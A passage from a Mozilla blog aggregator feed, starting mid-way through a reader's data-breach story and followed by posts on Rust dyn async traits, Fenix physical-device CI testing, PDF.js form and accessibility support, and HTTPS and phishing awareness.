When I called FedEx and gave the case number listed on the letter, the representative started asking what I felt were increasingly privacy-invading questions (wouldn’t the case number be enough information?), and I was worried this was a phishing expedition. Eventually, after a few more phone calls I was able to get this resolved. I think. No more letters. Fees removed. Still, it was unnerving.

Knitting the threads together in September

The email subject line caught my attention: Security Incident Notification. The e-commerce host for the adorable sock company I ordered from in May had been compromised. They wrote that:

The hosting company, by their own admission, forgot to enable one of the most basic security features, and this security oversight allowed our business to be attacked by an unknown 3rd party using a malicious file, allowing them to access some payment information.

The hosting company’s failure in ensuring traditional security and data-protection measures allowed the unknown 3rd-party to skim the information as it was entered.

So it appears the alarms that went off in June were related to a purchase I made in May. I can’t be sure that my data isn’t still out there, but at least my credit card has been replaced. I did check my credit report recently to make sure there wasn’t any suspicious activity.

The takeaway

I can only assume that the fraudsters had a huge dump of data, and they figured they could get away with theft from some people who wouldn’t even notice the charges. If the credit card hadn’t flagged the fraud, they might have gone unnoticed by someone who doesn’t review their monthly bill. It’s mildly inconvenient to have credit cards reissued, and it can also create problems with automatic bill-pays and urgent needs. Taking care of the fallout took time and effort. I’m assuming this is over, but maybe it’s not.

* * * * *

Truthfully, it could have been much worse. We can’t predict the future, but we can be prepared in case our personal information is ever part of a data breach. Luke Crouch, a cybersecurity expert with Mozilla, recommends people do the following when faced with a data breach:

  1. Lock down your email accounts by updating your passwords and setting up 2-factor authentication.
  2. Get a password manager.
  3. Use Firefox Monitor to see if your email has been part of any other breaches.

The bottom line: If you get snagged in a data breach, tie up any loose threads quickly to protect yourself, and stay on top of monitoring your accounts for suspicious activity.


*Ed note: This person’s name has been removed to protect their privacy.

At Mozilla, we work towards creating a safe and joyful Internet experience every day. That’s why this year for Cyber Security Awareness month, we’ll be featuring privacy and security experts as they weigh in on personal stories of cybercrime and more. Check back each week in October for a new story and expert advice on how to protect yourself online. In the meantime, kick start your own cyber security journey with products designed to keep you safe online, including Mozilla VPN, Firefox Monitor, and Firefox Relay.


The post Hacked! Unravelling a data breach appeared first on The Mozilla Blog.

Niko MatsakisDyn async traits, part 5

If you’re willing to use nightly, you can already model async functions in traits by using GATs and impl Trait — this is what the Embassy async runtime does, and it’s also what the real-async-trait crate does. One shortcoming, though, is that your trait doesn’t support dynamic dispatch. In the previous posts of this series, I have been exploring some of the reasons for that limitation, and what kind of primitive capabilities need to be exposed in the language to overcome it. My thought was that we could try to stabilize those primitive capabilities with the plan of enabling experimentation. I am still in favor of this plan, but I realized something yesterday: using procedural macros, you can ALMOST do this experimentation today! Unfortunately, it doesn’t quite work owing to some relatively obscure rules in the Rust type system (perhaps some clever readers will find a workaround; that said, these are rules I have wanted to change for a while).

Just to be crystal clear: Nothing in this post is intended to describe an “ideal end state” for async functions in traits. I still want to get to the point where one can write async fn in a trait without any further annotation and have the trait be “fully capable” (support both static dispatch and dyn mode while adhering to the tenets of zero-cost abstractions1). But there are some significant questions there, and to find the best answers for those questions, we need to enable more exploration, which is the point of this post.

Code is on github

The code covered in this blog post has been prototyped and is available on github. See the caveat at the end of the post, though!

Design goal

To see what I mean, let’s return to my favorite trait, AsyncIter:

trait AsyncIter {
    type Item;
    async fn next(&mut self) -> Option<Self::Item>;
}

The post is going to lay out how we can transform a trait declaration like the one above into a series of declarations that achieve the following:

  • We can use it as a generic bound (fn foo<T: AsyncIter>()), in which case we get static dispatch, full auto trait support, and all the other goodies that normally come with generic bounds in Rust.
  • Given a T: AsyncIter, we can coerce it into some form of DynAsyncIter that uses virtual dispatch. In this case, the type doesn’t reveal the specific T or the specific types of the futures.
    • I wrote DynAsyncIter, and not dyn AsyncIter on purpose — we are going to create our own type that acts like a dyn type, but which manages the adaptations needed for async.
    • For simplicity, let’s assume we want to box the resulting futures. Part of the point of this design though is that it leaves room for us to generate whatever sort of wrapping types we want.

You could write the code I’m showing here by hand, but the better route would be to package it up as a kind of decorator (e.g., #[async_trait_v2]2).

The basics: trait with a GAT

The first step is to transform the trait to have a GAT and a regular fn, in the way that we’ve seen many times:

trait AsyncIter {
    type Item;

    type Next<'me>: Future<Output = Option<Self::Item>>
    where
        Self: 'me;

    fn next(&mut self) -> Self::Next<'_>;
}

Next: define a “DynAsyncIter” struct

The next step is to manage the virtual dispatch (dyn) version of the trait. To do this, we are going to “roll our own” object by creating a struct DynAsyncIter. This struct plays the role of a Box<dyn AsyncIter> trait object. Instances of the struct can be created by calling DynAsyncIter::from with some specific iterator type; the DynAsyncIter type implements the AsyncIter trait, so once you have one you can just call next as usual:

let the_iter: DynAsyncIter<u32> = DynAsyncIter::from(some_iterator);
process_items(&mut the_iter);

async fn sum_items(iter: &mut impl AsyncIter<Item = u32>) -> u32 {
    let mut s = 0;
    while let Some(v) = iter.next().await {
        s += v;
    }
    s
}

Struct definition

Let’s look at how this DynAsyncIter struct is defined. First, we are going to “roll our own” object by creating a struct DynAsyncIter. This struct is going to model a Box<dyn AsyncIter> trait object; it will have one generic parameter for every ordinary associated type declared in the trait (not including the GATs we introduced for async fn return types). The struct itself has two fields, the data pointer (a box, but in raw form) and a vtable. We don’t know the type of the underlying value, so we’ll use ErasedData for that:

type ErasedData = ();

pub struct DynAsyncIter<Item> {
    data: *mut ErasedData,
    vtable: &'static DynAsyncIterVtable<Item>,
}

For the vtable, we will make a struct that contains a fn for each of the methods in the trait. Unlike the builtin vtables, we will modify the return type of these functions to be a boxed future:

struct DynAsyncIterVtable<Item> {
    drop_fn: unsafe fn(*mut ErasedData),
    next_fn: unsafe fn(&mut *mut ErasedData) -> Box<dyn Future<Output = Option<Item>> + '_>,
}

Implementing the AsyncIter trait

Next, we can implement the AsyncIter trait for the DynAsyncIter type. For each of the new GATs we introduced, we simply use a boxed future type. For the method bodies, we extract the function pointer from the vtable and call it:

impl<Item> AsyncIter for DynAsyncIter<Item> {
    type Item = Item;

    type Next<'me> = Box<dyn Future<Output = Option<Item>> + 'me>;

    fn next(&mut self) -> Self::Next<'_> {
        let next_fn = self.vtable.next_fn;
        unsafe { next_fn(&mut self.data) }
   }
}

The unsafe keyword here is asserting that the safety conditions of next_fn are met. We’ll cover that in more detail later, but in short those conditions are:

  • The vtable corresponds to some erased type T: AsyncIter
  • …and each instance of *mut ErasedData points to a valid Box<T> for that type.

Dropping the object

Speaking of Drop, we do need to implement that as well. It too will call through the vtable:

impl<Item> Drop for DynAsyncIter<Item> {
    fn drop(&mut self) {
        let drop_fn = self.vtable.drop_fn;
        unsafe { drop_fn(self.data); }
    }
}

We need to call through the vtable because we don’t know what kind of data we have, so we can’t know how to drop it correctly.

Creating an instance of DynAsyncIter

To create one of these DynAsyncIter objects, we can implement the From trait. This allocates a box, coerces it into a raw pointer, and then combines that with the vtable:

impl<Item, T> From<T> for DynAsyncIter<Item>
where
    T: AsyncIter<Item = Item>,
{
    fn from(value: T) -> DynAsyncIter<Item> {
        let boxed_value = Box::new(value);
        DynAsyncIter {
            data: Box::into_raw(boxed_value) as *mut (),
            vtable: dyn_async_iter_vtable::<T>(), // we’ll cover this fn later
        }
    }
}

Creating the vtable shims

Now we come to the most interesting part: how do we create the vtable for one of these objects? Recall that our vtable was a struct like so:

struct DynAsyncIterVtable<Item> {
    drop_fn: unsafe fn(*mut ErasedData),
    next_fn: unsafe fn(&mut *mut ErasedData) -> Box<dyn Future<Output = Option<Item>> + '_>,
}

We are going to need to create the values for each of those fields. In an ordinary dyn, these would be pointers directly to the methods from the impl, but for us they are “wrapper functions” around the core trait functions. The role of these wrappers is to introduce some minor coercions, such as allocating a box for the resulting future, as well as to adapt from the “erased data” to the true type:

// Safety conditions:
//
// The `*mut ErasedData` is actually the raw form of a `Box<T>` 
// that is valid for 'a.
unsafe fn next_wrapper<'a, T>(
    this: &'a mut *mut ErasedData,
) -> Box<dyn Future<Output = Option<T::Item>> + 'a>
where
    T: AsyncIter,
{
    let unerased_this: &mut Box<T> = unsafe { &mut *(this as *mut *mut ErasedData as *mut Box<T>) };
    let future: T::Next<'_> = <T as AsyncIter>::next(unerased_this);
    Box::new(future)
}

We’ll also need a “drop” wrapper:

// Safety conditions:
//
// The `*mut ErasedData` is actually the raw form of a `Box<T>` 
// and this function is being given ownership of it.
unsafe fn drop_wrapper<T>(
    this: *mut ErasedData,
)
where
    T: AsyncIter,
{
    let unerased_this = Box::from_raw(this as *mut T);
    drop(unerased_this); // Execute destructor as normal
}

Constructing the vtable

Now that we’ve defined the wrappers, we can construct the vtable itself. Recall that the From impl called a function dyn_async_iter_vtable::<T>. That function looks like this:

fn dyn_async_iter_vtable<T>() -> &'static DynAsyncIterVtable<T::Item>
where
    T: AsyncIter,
{
    const {
        &DynAsyncIterVtable {
            drop_fn: drop_wrapper::<T>,
            next_fn: next_wrapper::<T>,
        }
    }
}

This constructs a struct with the two function pointers: this struct only contains static data, so we are allowed to return a &'static reference to it.

Done!

And now the caveat, and a plea for help

Unfortunately, this setup doesn’t work quite how I described it. There are two problems:

  • const functions and expressions still have a lot of limitations, especially around generics like T, and I couldn’t get them to work;
  • Because of the rules introduced by RFC 1214, the &'static DynAsyncIterVtable<T::Item> type requires that T::Item: 'static, which may not be true here. This condition perhaps shouldn’t be necessary, but the compiler currently enforces it.

I wound up hacking something terrible that erased the T::Item type into usize and used Box::leak to get a &'static reference, just to prove out the concept. I’m almost embarrassed to show the code, but there it is.

Anyway, I know people have done some pretty clever tricks, so I’d be curious to know if I’m missing something and there is a way to build this vtable on Rust today. Regardless, it seems like extending const and a few other things to support this case is a relatively light lift, if we wanted to do that.

Conclusion

This blog post presented a way to implement the dyn dispatch ideas I’ve been talking about using only features that currently exist and are generally en route to stabilization. That’s exciting to me, because it means that we can start to do measurements and experimentation. For example, I would really like to know the performance impact of transitioning from async-trait to a scheme that uses a combination of static dispatch and boxed dynamic dispatch as described here. I would also like to explore whether there are other ways to wrap futures (e.g., with task-local allocators or other smart pointers) that might perform better. This would help inform what kind of capabilities we ultimately need.

Looking beyond async, I’m interested in tinkering with different models for dyn in general. As an obvious example, the “always boxed” version I implemented here has some runtime cost (an allocation!) and isn’t applicable in all environments, but it would be far more ergonomic. Trait objects would be Sized and would transparently work in far more contexts. We can also prototype different kinds of vtable adaptation.

  1. In the words of Bjarne Stroustrup, “What you don’t use, you don’t pay for. And further: What you do use, you couldn’t hand code any better.” 

  2. Egads, I need a snazzier name than that! 

Jan-Erik RedigerFenix Physical Device Testing

The Firefox for Android (Fenix) project runs extensive tests on every pull request and when merging code back into the main branch.

While many tests run within an isolated Java environment, Fenix also contains a multitude of UI tests. They allow testing the full application, interaction with the UI and other events. Running these requires the Android emulator running or a physical Android device connected. To run these tests in the CI environment the Fenix team relies on the Firebase test lab, a cloud-based testing service offering access to a range of physical and virtual devices to run Android applications on.

To speed up development, the automatically scheduled tests associated with a pull request are only run on virtual devices. These are quick to spin up, there is basically no upper limit of devices that can spawn on the cloud infrastructure and they usually produce the same result as running the test on a physical device.

But once in a while you encounter a bug that can only be reproduced reliably on a physical device. If you don't have access to such a device, what do you do? Or what if the bug happens on that one specific device type you don't have?

You remember that the Firebase Test Lab offers physical devices as well and the Fenix repository is very well set up to run your test on these too if needed!

Here's how you change the CI configuration to do this.

NOTE: Do not land a Pull Request that switches CI from virtual to physical devices! Add the pr:do-not-land label and call out that the PR is only there for testing!

By default the Fenix CI runs tests using virtual devices on x86. That's faster when the host is also an x86(_64) system, but most physical devices use the Arm platform. So first we need to instruct it to run tests on Arm.

Which platform to test on is defined in taskcluster/ci/ui-test/kind.yml. Find the line where it downloads the target.apk produced in a previous step and change it from x86 to arm64-v8a:

  run:
      commands:
-         - [wget, {artifact-reference: '<signing/public/build/x86/target.apk>'}, '-O', app.apk]
+         - [wget, {artifact-reference: '<signing/public/build/arm64-v8a/target.apk>'}, '-O', app.apk]

Then look for the line where it invokes the ui-test.sh and tell it to use arm64-v8a again:

  run:
      commands:
-         - [automation/taskcluster/androidTest/ui-test.sh, x86, app.apk, android-test.apk, '-1']
+         - [automation/taskcluster/androidTest/ui-test.sh, arm64-v8a, app.apk, android-test.apk, '-1']

With the old CI configuration it looked for Firebase parameters in automation/taskcluster/androidTest/flank-x86.yml. Now that we have switched the architecture it will pick up automation/taskcluster/androidTest/flank-arm64-v8a.yml instead.

In that file we can now pick the device we want to run on:

   device:
-   - model: Pixel2
+   - model: dreamlte
      version: 28

You can get a list of available devices by running gcloud locally:

gcloud firebase test android models list

The value from the MODEL_ID column is what you use for the model parameter in flank-arm64-v8a.yml. dreamlte translates to a Samsung Galaxy S8, which is available on Android API version 28.

If you only want to run a subset of tests, define the test-targets:

test-targets:
 - class org.mozilla.fenix.glean.BaselinePingTest

Specify an exact test class as above to run tests from just that class.
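
Flank also accepts broader target filters than a single class. As a sketch (the package name here is hypothetical, and the exact prefixes supported depend on your Flank version, so check the Flank documentation), you could run every UI test in one package:

test-targets:
 - package org.mozilla.fenix.ui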

And that's all the configuration necessary. Save your changes, commit them, then push up your code and create a pull request. Once the decision task on your PR finishes you will find a ui-test-x86-debug job (yes, x86, we didn't rename the job). Its log file will have details on the test run and contain links to the test run summary. Follow them to get more details, including the logcat output and a video of the test run.


This explanation will eventually move into documentation for Mozilla's Android projects.
Thanks to Richard Pappalardo & Aaron Train for the help figuring out how to run tests on physical devices and early feedback on the post. Thanks to Will Lachance for feedback and corrections. Any further errors are mine alone.

Mozilla Attack & DefenseImplementing form filling and accessibility in the Firefox PDF viewer

Intro

Last year, during lockdown, many discovered the importance of PDF forms when having to deal remotely with administrations and large organizations like banks. Firefox supported displaying PDF forms, but it didn’t support filling them: users had to print them, fill them by hand, and scan them back to digital form. We decided it was time to reinvest in the PDF viewer (PDF.js) and support filling PDF forms within Firefox to make our users’ lives easier.

While we invested more time in the PDF viewer, we also went through the backlog of work and prioritized improving the accessibility of our PDF reader for users of assistive technologies. Below we’ll describe how we implemented the form support, improved accessibility, and made sure we had no regressions along the way.

Brief Summary of the PDF.js Architecture

Overview of the PDF.js Architecture
To understand how we added support for forms and tagged PDFs, it’s first important to understand some basics about how the PDF viewer (PDF.js) works in Firefox.

First, PDF.js will fetch and parse the document in a web worker. The parsed document will then generate drawing instructions. PDF.js sends them to the main thread and draws them on an HTML5 canvas element.

Besides the canvas, PDF.js potentially creates three more layers that are displayed on top of it. The first layer, the text layer, enables text selection and search. It contains span elements that are transparent and line up with the text drawn below them on the canvas. The other two layers are the Annotation/AcroForm layer and the XFA form layer. They support form filling and we will describe them in more detail below.
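
As a rough sketch, the markup for a single rendered page is stacked roughly like this (class names are illustrative, not necessarily the exact ones the viewer uses):

<div class="page">
  <canvas></canvas>                    <!-- drawing instructions rendered here -->
  <div class="textLayer"></div>        <!-- transparent spans for selection and search -->
  <div class="annotationLayer"></div>  <!-- AcroForm fields as HTML elements -->
  <div class="xfaLayer"></div>         <!-- XFA forms as HTML elements -->
</div>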

Filling Forms (AcroForms)

AcroForms are one of the two types of forms that PDF supports, and the most common type of form.

AcroForm structure

Within a PDF file, the form elements are stored in the annotation data. Annotations in PDF are separate elements from the main content of a document. They are often used for things like taking notes on a document or drawing on top of a document. AcroForm annotation elements support user input similar to HTML inputs, e.g. text fields, check boxes, and radio buttons.

AcroForm implementation

In PDF.js, we parse a PDF file and create the annotations in a web worker. Then, we send them out from the worker and render them in the main process using HTML elements inserted in a div (annotation layer). We render this annotation layer, composed of HTML elements, on top of the canvas layer.

The annotation layer works well for displaying the form elements in the browser, but it was not compatible with the way PDF.js supports printing. When printing a PDF, we draw its contents on a special printing canvas, insert it into the current document and send it to the printer. To support printing form elements with user input, we needed to draw them on the canvas.

By inspecting (with the help of the qpdf tool) the raw PDF data of forms saved using other tools, we discovered that we needed to save the appearance of a filled field by using some PDF drawing instructions, and that we could support both saving and printing with a common implementation.

To generate the field appearance, we needed to get the values entered by the user. We introduced an object called annotationStorage to store those values by using callback functions in the corresponding HTML elements. The annotationStorage is then passed to the worker when saving or printing, and the values for each annotation are used to create an appearance.
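
A minimal sketch of the idea (illustrative only, not the actual PDF.js API): each form element registers a callback that records its current value under the annotation’s id, and the collected map is what gets sent to the worker when saving or printing.

// Illustrative stand-in for annotationStorage.
const annotationStorage = new Map();

function registerField(annotationId, inputElement) {
  inputElement.addEventListener("input", () => {
    annotationStorage.set(annotationId, inputElement.value);
  });
}

// When saving or printing, the collected values are handed to the worker,
// which uses them to generate the appearance of each filled field.
function serializeForWorker() {
  return Object.fromEntries(annotationStorage);
}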

Example PDF.js Form Rendering

On top, a filled form in Firefox; on the bottom, the printed PDF opened in Evince.

Safely Executing JavaScript within PDFs

Thanks to our Telemetry, we discovered that many forms contain and use embedded JavaScript code (yes, that’s a thing!).

JavaScript in PDFs can be used for many things, but is most commonly used to validate data entered by the user or automatically calculate formulas. For example, in this PDF, tax calculations are performed automatically starting from user input. Since this feature is common and helpful to users, we set out to implement it in PDF.js.

The alternatives

From the start of our JavaScript implementation, our main concern was security. We did not want PDF files to become a new vector for attacks. Embedded JS code must be executed when a PDF is loaded or on events generated by form elements (focus, input, …).

We investigated using the following:

  1. JS eval function
  2. JS engine compiled in WebAssembly with emscripten
  3. Firefox JS engine ComponentUtils.Sandbox

The first option, while simple, was immediately discarded since running untrusted code in eval is very unsafe.

Option two, using a JS engine compiled with WebAssembly, was a strong contender since it would work with the built-in Firefox PDF viewer and the version of PDF.js that can be used in regular websites. However, it would have been a large new attack surface to audit. It would have also considerably increased the size of PDF.js and it would have been slower.

The third option, sandboxes, is a feature exposed to privileged code in Firefox that allows JS execution in a special isolated environment. The sandbox is created with a null principal, which means that everything within the sandbox can only be accessed by it and can only access other things within the sandbox itself (and by privileged Firefox code).

Our final choice

We settled on using a ComponentUtils.Sandbox for the Firefox built-in viewer. ComponentUtils.Sandbox has been used for years now in WebExtensions, so this implementation is battle tested and very safe: executing a script from a PDF is at least as safe as executing one from a normal web page.

For the generic web viewer (where we can only use standard web APIs, so we know nothing about ComponentUtils.Sandbox) and the pdf.js test suite we used a WebAssembly version of QuickJS (see pdf.js.quickjs for details).

The implementation of the PDF sandbox in Firefox works as follows:

  • We collect all the fields and their properties (including the JS actions associated with them) and then clone them into the sandbox;
  • At build time, we generate a bundle with the JS code to implement the PDF JS API (totally different from the web API we are accustomed to!). We load it in the sandbox and then execute it with the data collected during the first step;
  • In the HTML representation of the fields we added callbacks to handle the events (focus, input, …). The callbacks simply dispatch them into the sandbox through an object containing the field identifier and linked parameters. We execute the corresponding JS actions in the sandbox using eval (it’s safe in this case: we’re in a sandbox). Then, we clone the result and dispatch it outside the sandbox to update the states in the HTML representations of the fields.

We decided not to implement the PDF APIs related to I/O (network, disk, …) to avoid any security concerns.
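
Putting those steps together, the dispatch flow looks roughly like this (a sketch only: the sandbox object and the message shape are illustrative, not the real PDF.js protocol):

// Illustrative only.
function onFieldEvent(fieldId, eventName, value, sandbox) {
  // Package the event with the field identifier and linked parameters...
  const detail = { id: fieldId, name: eventName, value };
  // ...dispatch it into the sandbox, where the corresponding JS action is
  // executed (eval is safe there: it runs inside the isolated sandbox)...
  const result = sandbox.dispatchEvent(detail);
  // ...then clone the result out of the sandbox and use it to update the
  // HTML representations of the fields.
  return JSON.parse(JSON.stringify(result));
}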

Yet Another Form Format: XFA

Our Telemetry also informed us that another type of PDF forms, XFA, was fairly common. This format has been removed from the official PDF specification, but many PDFs with XFA still exist and are viewed by our users so we decided to implement it as well.

The XFA format

The XFA format is very different from what is usually in PDF files. A normal PDF is typically a list of drawing commands with all layout statically defined by the PDF generator. However, XFA is much closer to HTML and has a more dynamic layout that the PDF viewer must generate. In reality XFA is a totally different format that was bolted on to PDF.

The XFA entry in a PDF contains multiple XML streams: the most important being the template and datasets. The template XML contains all the information required to render the form: it contains the UI elements (e.g. text fields, checkboxes, …) and containers (subform, draw, …) which can have static or dynamic layouts. The datasets XML contains all the data used by the form itself (e.g. text field content, checkbox state, …). All this data is bound into the template (before layout) to set the values of the different UI elements.

Example Template
<template xmlns="http://www.xfa.org/schema/xfa-template/3.6/">
  <subform>
    <pageSet name="ps">
      <pageArea name="page1" id="Page1">
        <contentArea x="7.62mm" y="30.48mm" w="200.66mm" h="226.06mm"/>
        <medium stock="default" short="215.9mm" long="279.4mm"/>
      </pageArea>
    </pageSet>
    <subform>
      <draw name="Text1" y="10mm" x="50mm" w="200mm" h="7mm">
        <font size="15pt" typeface="Helvetica"/>
        <value>
          <text>Hello XFA &amp; PDF.js world !</text>
        </value>
      </draw>
    </subform>
  </subform>
</template>
Output From Template

Rendering of XFA Document

The XFA implementation

In PDF.js we already had a pretty good XML parser to retrieve metadata about PDFs: it was a good start.

We decided to map every XML node to a JavaScript object, whose structure is used to validate the node (e.g. which children are allowed and how many of them). Once the XML is parsed and validated, the form data needs to be bound in the form template and some prototypes can be used with the help of SOM expressions (a kind of XPath expression).

The layout engine

In XFA, we can have different kinds of layouts and the final layout depends on the contents. We initially planned to piggyback on the Firefox layout engine, but we discovered that unfortunately we would need to lay everything out ourselves because XFA uses some layout features which don’t exist in Firefox. For example, when a container is overflowing the extra contents can be put in another container (often on a new page, but sometimes also in another subform). Moreover, some template elements don’t have any dimensions, which must be inferred based on their contents.

In the end we implemented a custom layout engine: we traverse the template tree from top to bottom and, following the layout rules, check if an element fits into the available space. If it doesn’t, we flush all the elements laid out so far into the current content area, and we move to the next one.
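
In pseudocode the traversal looks something like this (illustrative only; the real engine handles many more rules, such as overflow targets and inferred dimensions):

// Illustrative only: a simplified depth-first layout pass.
function layOut(node, contentArea, measure) {
  for (const child of node.children ?? []) {
    const size = measure(child, contentArea.remaining());
    if (!contentArea.fits(size)) {
      // Flush the elements laid out so far and continue in the next
      // content area (often a new page, sometimes another subform).
      contentArea.flush();
      contentArea = contentArea.next();
    }
    contentArea.place(child, size);
    layOut(child, contentArea, measure);
  }
  return contentArea;
}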

During layout, we convert all the XML elements into JavaScript objects with a tree structure. Then, we send them to the main process to be converted into HTML elements and placed in the XFA layer.

The missing font problem

As mentioned above, the dimensions of some elements are not specified. We must compute them ourselves based on the font used in them. This is even more challenging because sometimes fonts are not embedded in the PDF file.

Not embedding fonts in a PDF is considered bad practice, but in reality many PDFs do not include some well-known fonts (e.g. the ones shipped by Acrobat or Windows: Arial, Calibri, …) as PDF creators simply expected them to be always available.

To have our output more closely match Adobe Acrobat, we decided to ship the Liberation fonts and glyph widths of well-known fonts. We used the widths to rescale the glyph drawing to have compatible font substitutions for all the well-known fonts.
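
The rescaling itself boils down to simple per-glyph arithmetic, roughly like this (illustrative widths, expressed in font units):

// Illustrative only: stretch or shrink each substitute glyph horizontally so it
// occupies the same advance width as the glyph of the missing well-known font.
function glyphHorizontalScale(knownFontWidth, substituteFontWidth) {
  return knownFontWidth / substituteFontWidth;
}

// e.g. a 513-unit-wide glyph substituted by a 556-unit-wide Liberation glyph
// would be drawn with a horizontal scale of about 0.92.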

Comparing glyph rescaling

On the left: default font without glyph rescaling. On the right: Liberation font with glyph rescaling to emulate MyriadPro.

The result

In the end the result turned out quite well; for example, you can now open PDFs such as 5704 – APPLICATION FOR A FISH EXPORT LICENCE in Firefox 93!

Making PDFs accessible

What is a Tagged PDF?

Early versions of PDF were not a friendly format for accessibility tools such as screen readers. This was mainly because within a document, all text on a page is more or less absolutely positioned and there’s no notion of a logical structure such as paragraphs, headings or sentences. There was also no way to provide a text description of images or figures. For example, some pseudo code for how a PDF may draw text:

showText("This", 0 /*x*/, 60 /*y*/);
showText("is", 0, 40);
showText("a", 0, 20);
showText("Heading!", 0, 0);

This would draw text as four separate lines, but a screen reader would have no idea that they were all part of one heading. To help with accessibility, later versions of the PDF specification introduced “Tagged PDF.” This allowed PDFs to create a logical structure that screen readers could then use. One can think of this as a similar concept to an HTML hierarchy of DOM nodes. Using the example above, one could add tags:

beginTag("heading 1");
showText("This", 0 /*x*/, 60 /*y*/);
showText("is", 0, 40);
showText("a", 0, 20);
showText("Heading!", 0, 0);
endTag("heading 1");

With the extra tag information, a screen reader knows that all of the lines are part of “heading 1” and can read it in a more natural fashion. The structure also allows screen readers to easily navigate to different parts of the document.

The above example is only about text, but tagged PDFs support many more features than this, e.g. alt text for images, table data, lists, etc.

How we supported Tagged PDFs in PDF.js

For tagged PDFs we leveraged the existing “text layer” and the browser’s built-in HTML ARIA accessibility features. We can see this with a simple PDF example with one heading and one paragraph. First, we generate the logical structure and insert it into the canvas:

<canvas id="page1">
  <!-- This content is not visible, 
  but available to screen readers   -->
  <span role="heading" aria-level="1" aria-owns="heading_id"></span>
  <span aria-owns="some_paragraph"></span>
</canvas>

In the text layer that overlays the canvas:

<div id="text_layer">
  <span id="heading_id">Some Heading</span>
  <span id="some_paragraph">Hello world!</span>
</div>

A screen reader would then walk the DOM accessibility tree in the canvas and use the `aria-owns` attributes to find the text content for each node. For the above example, a screen reader would announce:

Heading Level 1 Some Heading
Hello World!

For those not familiar with screen readers, having this extra structure also makes navigating around the PDF much easier: you can jump from heading to heading and read paragraphs without unneeded pauses.

Ensuring there are no regressions at scale: meet reftests

Reference Test Analyzer

Crawling for PDFs

Over the past few months, we have built a web crawler to retrieve PDFs from the web and, using a set of heuristics, collect statistics about them (e.g. are they XFA? What fonts are they using? What formats of images do they include?).

We have also used the crawler with its heuristics to retrieve PDFs of interest from the “stressful PDF corpus” published by the PDF association, which proved particularly interesting as they contained many corner cases we did not think could exist.

With the crawler, we were able to build a large corpus of Tagged PDFs (around 32000), PDFs using JS (around 1900), and XFA PDFs (around 1200), which we could use for manual and automated testing. Kudos to our QA team for going through so many PDFs! They now know everything about asking for a fishing license in Canada, life skills!

Reftests for the win

We did not use the corpus only for manual QA; we also added some of those PDFs to our list of reftests (reference tests).

A reftest is a test consisting of a test file and a reference file. The test file uses the pdf.js rendering engine, while the reference file doesn’t (to make sure it is consistent and can’t be affected by changes in the patch the test is validating). The reference file is simply a screenshot of the rendering of a given PDF from the “master” branch of pdf.js.

The reftest process

When a developer submits a change to the PDF.js repo, we run the reftests and ensure the rendering of the test file is exactly the same as the reference screenshot. If there are differences, we ensure that the differences are improvements rather than regressions.

After accepting and merging a change, we regenerate the references.

The reftest shortcomings

In some situations a test may have subtle differences in rendering compared to the reference due to, e.g., anti-aliasing. This introduces noise in the results, with “fake” regressions the developer and reviewer have to sift through. Sometimes, it is possible to miss real regressions because of the large number of differences to look at.

Another shortcoming of reftests is that they are often big. A regression in a reftest is not as easy to investigate as a failure of a unit test.

Despite these shortcomings, reftests are a very powerful regression prevention weapon in the pdf.js arsenal. The large number of reftests we have boosts our confidence when applying changes.

Conclusion

Support for AcroForms landed in Firefox v84. JavaScript execution in v88. Tagged PDFs in v89. XFA forms in v93 (tomorrow, October 5th, 2021!).

While all of these features have greatly improved form usability and accessibility, there are still more features we’d like to add. If you’re interested in helping, we’re always looking for more contributors and you can join us on Element or GitHub.

The Mozilla BlogHTTPS and your online security

We have long advised Web users to look for HTTPS and the lock icon in the address bar of their favorite browser (Firefox!) before typing passwords or other private information into a website. These are solid tips, but it’s worth digging deeper into what HTTPS does and doesn’t do to protect your online security and what steps you need to take to be safer.

Trust is more than encryption

It’s true that looking for the lock icon and HTTPS will help you prevent attackers from seeing any information you submit to a website. HTTPS also prevents your internet service provider (ISP) from seeing what pages you visit beyond the top level of a website. That means they can see that you regularly visit https://www.reddit.com, for example, but they won’t see that you spend most of your time at https://www.reddit.com/r/CatGifs/. But while HTTPS does guarantee that your communication is private and encrypted, it doesn’t guarantee that the site won’t try to scam you.

Because here’s the thing: Any website can use HTTPS and encryption. This includes the good, trusted websites as well as the ones that are up to no good — the scammers, the phishers, the malware makers.

You might be scratching your head right now, wondering how a nefarious website can use HTTPS. You’ll be forgiven if you wonder in all caps HOW CAN THIS BE?

The answer is that the security of your connection to a website — which HTTPS provides — knows nothing about the information being relayed or the motivations of the entities relaying it. It’s a lot like having a phone. The phone company isn’t responsible for scammers calling you and trying to get your credit card. You have to be savvy about who you’re talking to. The job of HTTPS is to provide a secure line, not guarantee that you won’t be talking to crooks on it.

That’s your job. Tough love, I know. But think about it. Scammers go to great lengths to trick you, and their motives largely boil down to one: to separate you from your money. This applies everywhere in life, online and offline. Your job is to not get scammed.

How do you spot a scam website?

Consider the uniform. It generally evokes authority and trust. If a legit looking person in a spiffy uniform standing outside of your bank says she works for the bank and offers to take your cash in and deposit it, would you trust her? Of course not. You’d go directly to the bank yourself. Apply that same skepticism online.

Since scammers go to great lengths to trick you, you can expect them to appear in a virtual uniform to convince you to trust them. “Phishing” is a form of identity theft that occurs when a malicious website impersonates a legitimate one in order to trick you into giving up sensitive information such as passwords, account details or credit card numbers. Phishing attacks usually come from email messages that attempt to lure you, the recipient, into updating your personal information on fake but very real-looking websites. Those websites may also use HTTPS in an attempt to boost their legitimacy in your eyes.

Here are some things you should do.

Don’t click suspicious links.

I once received a message telling me that my Bank of America account had been frozen, and I needed to click through to fix it. It looked authentic; however, I don’t have a BoFA account. That’s what phishing is — casting a line to bait someone. If I did have a BoFA account, I may have clicked through and been hooked. A safer approach would be to go directly to the Bank of America website, or give them a call to find out if the email was fake.

If you get an email that says your bank account is frozen / your PayPal account has a discrepancy / you have an unpaid invoice / you get the idea, and it seems legitimate, go directly to the source. Do not click the link in the email, no matter how convinced you are.

Stop for alerts.

Firefox has a built-in Phishing and Malware Protection feature that will warn you when a page you visit has been flagged as a bad actor. If you see an alert, which looks like this, click the “Get me out of here!” button.

HTTPS matters

Most major websites that offer a customer login already use HTTPS. Think: financial institutions, media outlets, stores, social media. But it’s not universal. Not every website out there uses HTTPS automatically.

